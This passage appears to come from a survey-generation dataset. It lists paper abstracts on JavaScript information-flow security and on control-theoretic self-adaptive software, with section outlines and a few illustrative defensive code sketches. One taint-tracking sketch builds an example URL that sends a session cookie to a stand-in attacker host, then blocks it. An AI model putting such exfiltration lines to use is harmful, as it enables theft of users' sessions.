not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application.
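The dynamic data tainting described in the cross-site scripting prevention abstract directly above can be sketched very simply: values derived from sensitive sources carry a taint bit, the bit propagates through operations, and it is checked at outbound sinks. The TypeScript fragment below is a toy model under those assumptions; the source, sink, and policy names are invented for illustration.

```typescript
// Sketch of client-side dynamic data tainting: values derived from sensitive
// sources stay tainted, and taint is checked at outbound "network" sinks.

interface Tainted<T> { value: T; tainted: boolean; }

const source = <T>(value: T): Tainted<T> => ({ value, tainted: true });   // e.g. a cookie
const literal = <T>(value: T): Tainted<T> => ({ value, tainted: false }); // program constant

// Taint propagates through string operations.
function concat(a: Tainted<string>, b: Tainted<string>): Tainted<string> {
  return { value: a.value + b.value, tainted: a.tainted || b.tainted };
}

// Sink: sending data to a third party. A policy (or the user) decides.
function sendRequest(url: Tainted<string>, thirdParty: boolean): void {
  if (url.tainted && thirdParty) {
    console.warn(`blocked: tainted data would leave the page via ${url.value}`);
    return;
  }
  console.log(`request sent to ${url.value}`);
}

const cookie = source("SESSIONID=1234");
const exfil = concat(literal("https://attacker.example/?c="), cookie);

sendRequest(literal("https://site.example/api"), false); // untainted, same site: allowed
sendRequest(exfil, true);                                // tainted flow to third party: blocked
```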
--- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Mash-IF: Practical information-flow control within client-side mashups paper_content: Mashup is a representative of Web 2.0 technology that needs both convenience of cross-domain access and protection against the security risks it brings in. Solutions proposed by prior research focused on mediating access to the data in different domains, but little has been done to control the use of the data after the access. In this paper, we present Mash-IF, a new technique for information-flow control within mashups. Our approach allows cross-domain communications within a browser, but disallows disclosure of sensitive information to remote parties without the user's permission. It mediates the cross-domain channels in existing mashups and works on the client without collaborations from other parties. 
Also of particular interest is a novel technique that automatically generates declassification rules for a script by statically analyzing its code. Such rules can be efficiently enforced through monitoring the script's call sequences and DOM operations. --- paper_title: GATEKEEPER: Mostly Static Enforcement of Security and Reliability Policies for JavaScript Code paper_content: The advent of Web 2.0 has lead to the proliferation of client-side code that is typically written in JavaScript. This code is often combined -- or mashed-up -- with other code and content from disparate, mutually untrusting parties, leading to undesirable security and reliability consequences. ::: ::: This paper proposes GATEKEEPER, a mostly static approach for soundly enforcing security and reliability policies for JavaScript programs. GATEKEEPER is a highly extensible system with a rich, expressive policy language, allowing the hosting site administrator to formulate their policies as succinct Datalog queries. ::: ::: The primary application of GATEKEEPER this paper explores is in reasoning about JavaScript widgets such as those hosted by widget portals Live.com and Google/IG. Widgets submitted to these sites can be either malicious or just buggy and poorly written, and the hosting site has the authority to reject the submission of widgets that do not meet the site's security policies. ::: ::: To show the practicality of our approach, we describe nine representative security and reliability policies. Statically checking these policies results in 1,341 verified warnings in 684 widgets, no false negatives, due to the soundness of our analysis, and false positives affecting only two widgets. --- paper_title: Reactive non-interference for a browser model paper_content: We investigate non-interference (secure information flow) policies for web browsers, replacing or complementing the Same Origin Policy. First, we adapt a recently proposed dynamic information flow enforcement mechanism to support asynchronous I/O. We prove detailed security and precision results for this enforcement mechanism, and implement it for the Featherweight Firefox browser model. Second, we investigate three useful web browser security policies that can be enforced by our mechanism, and demonstrate their value and limitations. --- paper_title: FlowFox: a web browser with flexible and precise information flow control paper_content: We present FlowFox, the first fully functional web browser that implements a precise and general information flow control mechanism for web scripts based on the technique of secure multi-execution. We demonstrate how FlowFox subsumes many ad-hoc script containment countermeasures developed over the last years. We also show that FlowFox is compatible with the current web, by investigating its behavior on the Alexa top-500 web sites, many of which make intricate use of JavaScript. The performance and memory cost of FlowFox is substantial (a performance cost of around 20% on macro benchmarks for a simple two level policy), but not prohibitive. Our prototype implementation shows that information flow enforcement based on secure multi-execution can be implemented in full-scale browsers. It can support powerful, yet precise policies refining the same-origin-policy in a way that is compatible with existing websites. 
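Secure multi-execution, the technique behind FlowFox described in the abstract above, can be illustrated with a very small sketch: the program is executed once per security level, the low run receives a default value instead of the secret input, and only the low run may produce public output. The TypeScript fragment below is a minimal model of that idea, assuming a two-level lattice and an invented channel API; it is not FlowFox's implementation.

```typescript
// Sketch of secure multi-execution (SME) for a two-level lattice.

type Level = "L" | "H";

interface Channels {
  readSecret(): string;           // H input
  writePublic(msg: string): void; // L output
}

// An arbitrary (possibly leaky) program written against the channel API.
function program(io: Channels): void {
  const secret = io.readSecret();
  io.writePublic(`len=${secret.length}`); // would leak in a single execution
}

function secureMultiExecute(run: (io: Channels) => void, secretInput: string): void {
  const runs: Level[] = ["L", "H"];
  for (const level of runs) {
    run({
      // The low run gets a fixed default instead of the real secret.
      readSecret: () => (level === "H" ? secretInput : ""),
      // Only the low run may emit public output; the high run's public
      // writes are suppressed, so they cannot depend on the secret.
      writePublic: (msg) => {
        if (level === "L") console.log(`public output: ${msg}`);
      },
    });
  }
}

secureMultiExecute(program, "top-secret"); // prints "public output: len=0"
```

The cost of the extra executions is exactly the performance overhead that the FlowFox abstract reports, and faceted values (discussed elsewhere in this reference list) can be read as an optimisation that simulates the multiple runs within a single execution.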
--- paper_title: AdJail: Practical Enforcement of Confidentiality and Integrity Policies on Web Advertisements paper_content: Web publishers frequently integrate third-party advertisements into web pages that also contain sensitive publisher data and end-user personal data. This practice exposes sensitive page content to confidentiality and integrity attacks launched by advertisements. In this paper, we propose a novel framework for addressing security threats posed by third-party advertisements. The heart of our framework is an innovative isolation mechanism that enables publishers to transparently interpose between advertisements and end users. The mechanism supports finegrained policy specification and enforcement, and does not affect the user experience of interactive ads. Evaluation of our framework suggests compatibility with several mainstream ad networks, security from many threats from advertisements and acceptable performance overheads. --- paper_title: Featherweight Firefox Formalizing the Core of a Web Browser paper_content: We offer a formal specification of the core functionality of a web browser in the form of a small-step operational semantics. The specification accurately models the asynchronous nature of web browsers and covers the basic aspects of windows, DOM trees, cookies, HTTP requests and responses, user input, and a minimal scripting language with first-class functions, dynamic evaluation, and AJAX requests. No security enforcement mechanisms are included--instead, the model is intended to serve as a basis for formalizing and experimenting with different security policies and mechanisms. We survey the most interesting design choices and discuss how our model relates to real web browsers. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. 
We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Information-Flow Security for a Core of JavaScript paper_content: Tracking information flow in dynamic languages remains an important and intricate problem. This paper makes substantial headway toward understanding the main challenges and resolving them. We identify language constructs that constitute a core of Java Script: objects, higher-order functions, exceptions, and dynamic code evaluation. The core is powerful enough to naturally encode native constructs as arrays, as well as functionalities of Java Script's API from the document object model (DOM) related to document tree manipulation and event processing. As the main contribution, we develop a dynamic type system that guarantees information-flow security for this language. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Using Datalog with Binary Decision Diagrams for Program Analysis paper_content: Many problems in program analysis can be expressed naturally and concisely in a declarative language like Datalog. This makes it easy to specify new analyses or extend or compose existing analyses. However, previous implementations of declarative languages perform poorly compared with traditional implementations. This paper describes bddbddb, a BDD-Based Deductive DataBase, which implements the declarative language Datalog with stratified negation, totally-ordered finite domains and comparison operators. bddbddb uses binary decision diagrams (BDDs) to efficiently represent large relations. BDD operations take time proportional to the size of the data structure, not the number of tuples in a relation, which leads to fast execution times. 
bddbddb is an effective tool for implementing a large class of program analyses. We show that a context-insensitive points-to analysis implemented with bddbddb is about twice as fast as a carefully hand-tuned version. The use of BDDs also allows us to solve heretofore unsolved problems, like context-sensitive pointer analysis for large programs. --- paper_title: GULFSTREAM: Staged Static Analysis for Streaming JavaScript Applications paper_content: The advent of Web 2.0 has led to the proliferation of client-side code that is typically written in JavaScript. Recently, there has been an upsurge of interest in static analysis of client-side JavaScript for applications such as bug finding and optimization. However, most approaches in static analysis literature assume that the entire program is available to analysis. This, however, is in direct contradiction with the nature of Web 2.0 programs that are essentially being streamed at the user's browser. Users can see data being streamed to pages in the form of page updates, but the same thing can be done with code, essentially delaying the downloading of code until it is needed. In essence, the entire program is never completely available. Interacting with the application causes more code to be sent to the browser. ::: ::: This paper explores staged static analysis as a way to analyze streaming JavaScript programs. We observe while there is variance in terms of the code that gets sent to the client, much of the code of a typical JavaScript application can be determined statically. As a result, we advocate the use of combined offline-online static analysis as a way to accomplish fast, browser-based client-side online analysis at the expense of a more thorough and costly server-based offline analysis on the static code. We find that in normal use, where updates to the code are small, we can update static analysis results quickly enough in the browser to be acceptable for everyday use. We demonstrate the staged analysis approach to be advantageous especially in mobile devices, by experimenting on popular applications such as Facebook. --- paper_title: GATEKEEPER: Mostly Static Enforcement of Security and Reliability Policies for JavaScript Code paper_content: The advent of Web 2.0 has lead to the proliferation of client-side code that is typically written in JavaScript. This code is often combined -- or mashed-up -- with other code and content from disparate, mutually untrusting parties, leading to undesirable security and reliability consequences. ::: ::: This paper proposes GATEKEEPER, a mostly static approach for soundly enforcing security and reliability policies for JavaScript programs. GATEKEEPER is a highly extensible system with a rich, expressive policy language, allowing the hosting site administrator to formulate their policies as succinct Datalog queries. ::: ::: The primary application of GATEKEEPER this paper explores is in reasoning about JavaScript widgets such as those hosted by widget portals Live.com and Google/IG. Widgets submitted to these sites can be either malicious or just buggy and poorly written, and the hosting site has the authority to reject the submission of widgets that do not meet the site's security policies. ::: ::: To show the practicality of our approach, we describe nine representative security and reliability policies. Statically checking these policies results in 1,341 verified warnings in 684 widgets, no false negatives, due to the soundness of our analysis, and false positives affecting only two widgets. 
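GATEKEEPER expresses its policies as Datalog queries and bddbddb evaluates Datalog relations over BDDs; neither implementation is reproduced here. The fragment below only illustrates the flavour of such a policy, transitive flow between program points, using a naive least-fixpoint computation in TypeScript; the relation and node names are invented for the example.

```typescript
// Datalog-style policy, written here as a comment in Datalog notation:
//   flows(X, Z) :- assign(X, Z).
//   flows(X, Z) :- flows(X, Y), assign(Y, Z).
// Below: a naive least-fixpoint computation of `flows` from an `assign` relation.

type Edge = [string, string];

const assign: Edge[] = [
  ["document.cookie", "tmp"],
  ["tmp", "url"],
  ["url", "xhr.send"],
];

function leastFixpoint(base: Edge[]): Set<string> {
  const flows = new Set(base.map(([x, z]) => `${x}->${z}`));
  let changed = true;
  while (changed) {
    changed = false;
    for (const f of [...flows]) {
      const [x, y] = f.split("->");
      for (const [y2, z] of base) {
        if (y === y2 && !flows.has(`${x}->${z}`)) {
          flows.add(`${x}->${z}`); // apply the recursive rule
          changed = true;
        }
      }
    }
  }
  return flows;
}

// Policy query: does anything flow from document.cookie into xhr.send?
const flows = leastFixpoint(assign);
console.log(flows.has("document.cookie->xhr.send")); // true -> reject the widget
```

Real systems replace the explicit set of tuples with BDD-encoded relations, which is what makes whole-program, context-sensitive variants of such queries tractable.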
--- paper_title: The Essence of JavaScript paper_content: We reduce JavaScript to a core calculus structured as a small-step operational semantics. We present several peculiarities of the language and show that our calculus models them. We explicate the desugaring process that turns JavaScript programs into ones in the core. We demonstrate faithfulness to JavaScript using real-world test suites. Finally, we illustrate utility by defining a security property, implementing it as a type system on the core, and extending it to the full language. --- paper_title: Object Capabilities and Isolation of Untrusted Web Applications paper_content: A growing number of current web sites combine active content (applications) from untrusted sources, as in so-called mashups. The object-capability model provides an appealing approach for isolating untrusted content: if separate applications are provided disjoint capabilities, a sound object-capability framework should prevent untrusted applications from interfering with each other, without preventing interaction with the user or the hosting page. In developing language-based foundations for isolation proofs based on object-capability concepts, we identify a more general notion of authority safety that also implies resource isolation. After proving that capability safety implies authority safety, we show the applicability of our framework for a specific class of mashups. In addition to proving that a JavaScript subset based on Google Caja is capability safe, we prove that a more expressive subset of JavaScript is authority safe, even though it is not based on the object-capability model. --- paper_title: Isolating JavaScript with filters, rewriting, and wrappers paper_content: We study methods that allow web sites to safely combine JavaScript from untrusted sources. If implemented properly, filters can prevent dangerous code from loading into the execution environment, while rewriting allows greater expressiveness by inserting run-time checks. ::: ::: Wrapping properties of the execution environment can prevent misuse without requiring changes to imported JavaScript. Using a formal semantics for the ECMA 262-3 standard language, we prove security properties of a subset of JavaScript, comparable in expressiveness to Facebook FBJS, obtained by combining three isolation mechanisms. The isolation guarantees of the three mechanisms are interdependent, with rewriting and wrapper functions relying on the absence of JavaScript constructs eliminated by language filters. --- paper_title: An operational semantics for javascript paper_content: We define a small-step operational semantics for the ECMAScript standard language corresponding to JavaScript, as a basis for analyzing security properties of web applications and mashups. The semantics is based on the language standard and a number of experiments with different implementations and browsers. Some basic properties of the semantics are proved, including a soundness theorem and a characterization of the reachable portion of the heap. --- paper_title: Language-Based Isolation of Untrusted JavaScript paper_content: Web sites that incorporate untrusted content may use browser- or language-based methods to keep such content from maliciously altering pages, stealing sensitive information, or causing other harm. We study language-based methods for filtering and rewriting JavaScript code, using Yahoo! ADSafe and Facebook FBJS as motivating examples. 
We explain the core problems by describing previously unknown vulnerabilities and subtleties, and develop a foundation for improved solutions based on an operational semantics of the full ECMA-262 language. We also discuss how to apply our analysis to address the JavaScript isolation problems we discovered. --- paper_title: ADsafety: Type-Based Verification of JavaScript Sandboxing paper_content: Web sites routinely incorporate JavaScript programs from several sources into a single page. These sources must be protected from one another, which requires robust sandboxing. The many entry-points of sandboxes and the subtleties of JavaScript demand robust verification of the actual sandbox source. We use a novel type system for JavaScript to encode and verify sandboxing properties. The resulting verifier is lightweight and efficient, and operates on actual source. We demonstrate the effectiveness of our technique by applying it to ADsafe, which revealed several bugs and other weaknesses. --- paper_title: Automated Analysis of Security-Critical JavaScript APIs paper_content: JavaScript is widely used to provide client-side functionality in Web applications. To provide services ranging from maps to advertisements, Web applications may incorporate untrusted JavaScript code from third parties. The trusted portion of each application may then expose an API to untrusted code, interposing a reference monitor that mediates access to security-critical resources. However, a JavaScript reference monitor can only be effective if it cannot be circumvented through programming tricks or programming language idiosyncrasies. In order to verify complete mediation of critical resources for applications of interest, we define the semantics of a restricted version of JavaScript devised by the ECMA Standards committee for isolation purposes, and develop and test an automated tool that can soundly establish that a given API cannot be circumvented or subverted. Our tool reveals a previously-undiscovered vulnerability in the widely-examined Yahoo! AD Safe filter and verifies confinement of the repaired filter and other examples from the Object-Capability literature. --- paper_title: Mashic Compiler: Mashup Sandboxing Based on Inter-frame Communication paper_content: Mashups are a prevailing kind of web applications integrating external gadget APIs often written in the JavaScript programming language. Writing secure mashups is a challenging task due to the heterogeneity of existing gadget APIs, the privileges granted to gadgets during mashup executions, and JavaScript's highly dynamic environment. We propose a new compiler , called Mashic, for the automatic generation of secure JavaScript-based mashups from existing mashup code. The Mashic compiler can effortlessly be applied to existing mashups based on a wide-range of gadget APIs. It offers security and correct-ness guarantees. Security is achieved via the Same Origin Policy. Correctness is ensured in the presence of benign gadgets, that satisfy confidentiality and integrity constrains with regard to the integrator code. The compiler has been successfully applied to real world mashups based on Google maps, Bing maps, YouTube, and Zwibbler APIs. --- paper_title: Security of Web Mashups: a Survey paper_content: Web mashups, a new web application development paradigm, combine content and services from multiple origins into a new service. Web mashups heavily depend on interaction between content from multiple origins and communication with different origins. 
In contrast, mashup security relies on separation for protecting code and data. Traditional HTML techniques fail to address both the interaction/communication needs and the separation needs. This paper proposes concrete requirements for building secure mashups, divided into four categories: separation, interaction, communication and advanced behavior control. For the first three categories, all currently available techniques are discussed in light of the proposed requirements. For the last category, we present three relevant academic research results with high potential. We conclude the paper by highlighting the most applicable techniques for building secure mashups, because of their functionality and standardization. We also discuss opportunities for future improvements and developments. ---
Title: Survey on JavaScript Security Policies and their Enforcement Mechanisms in a Web Browser
Section 1: Introduction
Description 1: Introduce the rapid growth of web-based applications, the role of JavaScript, and outline the goal of the survey on security enforcement mechanisms.
Section 2: Background on JavaScript Security
Description 2: Provide an overview of web browser architecture, access control mechanisms, and security problems related to JavaScript programs.
Section 3: Security-relevant browser APIs
Description 3: Identify and describe the set of security-relevant APIs in the browser and their role in security policies.
Section 4: Dynamic techniques based on runtime monitoring
Description 4: Present dynamic techniques based on runtime monitoring for JavaScript security and give examples of safety properties enforced by these techniques.
Section 5: Information flow security analysis for JavaScript
Description 5: Discuss the main achievements in applying information flow analysis to JavaScript, including explicit and implicit information flows, flow-sensitivity, and static vs. dynamic analysis.
Section 6: Summary of information flow policies
Description 6: Gather and summarize the information flow policies enforced by various techniques.
Section 7: Other related work on JavaScript Security
Description 7: Discuss additional work in the area of JavaScript security, including static analysis of widgets, analysis of sandboxing libraries, and other approaches to mashup security.
Section 8: Conclusion
Description 8: Conclude the survey with a summary of the discussed techniques and their effectiveness in enforcing JavaScript security policies.
A systematic survey on the design of self-adaptive software systems using control engineering approaches
7
--- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: Beyond objects: a software design paradigm based on process control paper_content: A standard demonstration problem in object-oriented programming is the design of an automobile cruise control. This design exercise demonstrates object-oriented techniques well, but it does not ask whether the object-oriented paradigm is the best one for the task. Here we examine the alternative view that cruise control is essentially a control problem. We present a new software organization paradigm motivated by process control loops. The control view leads us to an architecture that is dominated by analysis of a classical feedback loop rather than by the identification of discrete stateful components to treat as objects. The change in architectural model calls attention to important questions about the cruise control task that aren't addressed in an object-oriented design. 
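The process-control view of software described in the last abstract above can be made concrete with a very small closed loop. The TypeScript sketch below regulates a hypothetical measured output (a response time) around a setpoint by adjusting one actuator (an admission-control limit) with an integral controller; the toy plant model and the gain are invented purely for illustration and do not come from any of the cited works.

```typescript
// Minimal closed-loop sketch in the process-control style: an integral (I)
// controller adjusts an actuator so that the measured output tracks a setpoint.
// The "plant" is an invented first-order model of a server whose response
// time grows with the number of admitted concurrent requests.

function plantResponseTime(admittedRequests: number): number {
  const serviceTime = 0.05;                          // seconds per request (assumed)
  return serviceTime * (1 + admittedRequests / 10);  // toy first-order model
}

function runControlLoop(setpointSeconds: number, steps: number): void {
  const gain = 40;     // integral gain, hand-tuned for the toy plant
  let admitted = 100;  // actuator: maximum concurrent requests
  for (let k = 0; k < steps; k++) {
    const measured = plantResponseTime(admitted);    // sensor reading
    const error = setpointSeconds - measured;        // compare with reference
    admitted = Math.max(1, admitted + gain * error); // integral control action
    console.log(`step ${k}: admitted=${admitted.toFixed(1)} rt=${measured.toFixed(3)}s`);
  }
}

// Drive the response time towards a 0.3 s target; the loop settles near 50 admitted requests.
runControlLoop(0.3, 10);
```

The sensor/compare/actuate structure of this loop is exactly the feedback architecture that the cited works argue should dominate the design of self-adaptive software, in place of a purely object-oriented decomposition.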
--- paper_title: Challenges in control engineering of computing systems paper_content: Over the last few years, there has been considerable success with applying control theory to computing systems. Our experience has been that there are several commonly occurring control problems in computing systems - translating between service oriented units (e.g., response times) and effector (actuator) units (e.g., the maximum number of connected users); optimizing resource usage; regulating service levels to enforce service level agreements; and adapting to disturbances such as changes in workloads. Developing control systems that address these problems involves challenges related to modeling the managed element (plant); handing sensor data that are noisy, incomplete, and inconsistent; dealing with effectors that have complex effects that often do not correspond well to the control objectives; and designing control systems (especially filters, the choice of measured outputs, and time delays). --- paper_title: Honoring SLAs on cloud computing services: A control perspective paper_content: This work contains a short survey of recent results in the literature with a view to opening up new research directions for the problem of honoring SLAs on cloud computing services. This is a new problem that has attracted significant interest recently, due to the urgent need for providers to provide reliable, customized and QoS guaranteed computing dynamic environments for end-users as agreed in contracts on the basis of certain Service Level Agreements (SLAs). Honoring SLAs is a multi-faceted problem that may involve optimal use of the available resources, optimization of the system's performance and availability or maximization of the provider's revenue and it poses a significant challenge for researchers and system administrators due to the volatile, huge and unpredictable Web environments where these computing systems reside. The use of algorithms possessing run-time adaptation features, such as dynamic resource allocation, admission control and optimization becomes an absolute must. As a continuation of the recent successful application of control theory concepts and methods to the computing systems area, our survey indicates that the problem of honoring SLAs on cloud computing services is a new interesting application for control theory and that researchers can benefit significantly from a number of well-known modern control methodologies, such as hybrid, supervisory, hierarchical and model predictive control. --- paper_title: Feedback Control of Computing Systems paper_content: Preface. PART I: BACKGROUND. 1. Introduction and Overview. PART II: SYSTEM MODELING. 2. Model Construction. 3. Z-Transforms and Transfer Functions. 4. System Modeling with Block Diagrams. 5. First-Order Systems. 6. Higher-Order Systems. 7. State-Space Models. PART III: CONTROL ANALYSIS AND DESIGN. 8. Proportional Control. 9. PID Controllers. 10. State-Space Feedback Control. 11. Advanced Topics. Appendix A: Mathematical Notation. Appendix B: Acronyms. Appendix C: Key Results. Appendix D: Essentials of Linear Algebra. Appendix E: MATLAB Basics. References. Index. --- paper_title: Software Engineering for Self-Adaptive Systems paper_content: One of the main goals of a self-adaptable software system is to meet the required Quality of Service (QoS) by autonomously modifying its structure/behavior in response to changes in the supporting infrastructure and surrounding physical environment. 
A key issue in the design and development of such system is the assessment of their effectiveness, both in terms of their ability to meet the required QoS under different operating conditions, and in terms of the costs involved by the reconfiguration process, which could outweigh the benefit of the reconfiguration. This paper introduces an approach to support this assessment, with a focus on performance and dependability attributes. Our approach is based on the idea of defining a model transformation chain that maps a “design oriented” model of the system to an “analysis oriented” model that lends itself to the application of a suitable analysis methodology. We identify some key concepts that should be present in the design model of a dynamically adaptable system, and show how to devise a transformation from such a model to a target analysis models, focusing in particular on models of component or service oriented systems --- paper_title: A survey of autonomic computing—degrees, models, and applications paper_content: Autonomic Computing is a concept that brings together many fields of computing with the purpose of creating computing systems that self-manage. In its early days it was criticised as being a “hype topic” or a rebadging of some Multi Agent Systems work. In this survey, we hope to show that this was not indeed ‘hype’ and that, though it draws on much work already carried out by the Computer Science and Control communities, its innovation is strong and lies in its robust application to the specific self-management of computing systems. To this end, we first provide an introduction to the motivation and concepts of autonomic computing and describe some research that has been seen as seminal in influencing a large proportion of early work. Taking the components of an established reference model in turn, we discuss the works that have provided significant contributions to that area. We then look at larger scaled systems that compose autonomic systems illustrating the hierarchical nature of their architectures. Autonomicity is not a well defined subject and as such different systems adhere to different degrees of Autonomicity, therefore we cross-slice the body of work in terms of these degrees. From this we list the key applications of autonomic computing and discuss the research work that is missing and what we believe the community should be considering. --- paper_title: A survey on performance management for internet applications paper_content: Internet applications have become indispensable for many business and personal processes, turning the performance of these applications into a key issue. For this reason, recent research has comprehensively explored mechanisms for managing the performance of these applications, with special focus on dealing with overload situations and providing QoS guarantees to clients. This paper makes a survey on the different proposals in the literature for managing Internet applications' performance. We present a complete taxonomy that characterizes and classifies these proposals into several categories including request scheduling, admission control, service differentiation, dynamic resource management, service degradation, control theoretic approaches, works using queuing models, observation-based approaches that use runtime measurements, and overall approaches combining several mechanisms. For each work, we provide a brief description in order to provide the reader with a global understanding of the research progress in this area. 
Copyright © 2009 John Wiley & Sons, Ltd. --- paper_title: Research challenges in control engineering of computing systems paper_content: A wide variety of software systems employ closed loops (feedback) to achieve service level objectives and to optimize resource usage. Control theory provides a systematic approach to constructing closed loop systems, and is widely used in disciplines such as mechanical and electrical engineering. This paper describes recent advances in applying control theory to computing systems, and identifies research challenges to address so that control engineering can be widely used by software practitioners. --- paper_title: A multi-model framework to implement self-managing control systems for QoS management paper_content: Many control theory based approaches have been proposed to provide QoS assurance in increasingly complex software systems. These approaches generally use single model based, fixed or adaptive control techniques for QoS management of such systems. With varying system dynamics and unpredictable environmental changes, however, it is difficult to design a single model or controller to achieve the desired QoS performance across all the operating regions of these systems. In this paper, we propose a multi-model framework to capture the multi-model nature of software systems and implement self-managing control systems for them. A reference-model and extendable class library are introduced to implement such self-managing control systems. The proposed approach is also validated and compared to fixed and adaptive control schemes through a range of experiments. --- paper_title: Self-adaptive software: Landscape and research challenges paper_content: Software systems dealing with distributed applications in changing environments normally require human supervision to continue operation in all conditions. These (re-)configuring, troubleshooting, and in general maintenance tasks lead to costly and time-consuming procedures during the operating phase. These problems are primarily due to the open-loop structure often followed in software development. Therefore, there is a high demand for management complexity reduction, management automation, robustness, and achieving all of the desired quality requirements within a reasonable cost and time range during operation. Self-adaptive software is a response to these demands; it is a closed-loop system with a feedback loop aiming to adjust itself to changes during its operation. These changes may stem from the software system's self (internal causes, e.g., failure) or context (external events, e.g., increasing requests from users). Such a system is required to monitor itself and its context, detect significant changes, decide how to react, and act to execute such decisions. These processes depend on adaptation properties (called self-* properties), domain characteristics (context information or models), and preferences of stakeholders. Noting these requirements, it is widely believed that new models and frameworks are needed to design self-adaptive software. This survey article presents a taxonomy, based on concerns of adaptation, that is, how, what, when and where, towards providing a unified view of this emerging area. Moreover, as adaptive systems are encountered in many disciplines, it is imperative to learn from the theories and models developed in these other areas. 
This survey article presents a landscape of research in self-adaptive software by highlighting relevant disciplines and some prominent research projects. This landscape helps to identify the underlying research gaps and elaborates on the corresponding challenges. --- paper_title: Control Systems application in Java based Enterprise and Cloud Environments - A Survey paper_content: The classical feedback control systems has been a successful theory in many engineering applications like electrical power, process, and manufacturing industries. For more than a decade there is active research in exploring feedback control systems applications in computing and some of the results are applied to the commercial software products. There are good number of research review papers on this subject exist, giving high level overview, explaining specific applications like load balancing or CPU utilization power management in data centers. We observe that majority of the control system applications are in Web and Application Server environments. We attempt to discuss on how control systems is applied to Web and Application(JEE) Servers that are deployed in Enterprise and cloud environments. Our paper presents this review with a specific emphasis on Java based Web, Application and Enterprise Server Bus environments. We conclude with the future reserach in applying control systems to Enterprise and Cloud environments. --- paper_title: Challenges in control engineering of computing systems paper_content: Over the last few years, there has been considerable success with applying control theory to computing systems. Our experience has been that there are several commonly occurring control problems in computing systems - translating between service oriented units (e.g., response times) and effector (actuator) units (e.g., the maximum number of connected users); optimizing 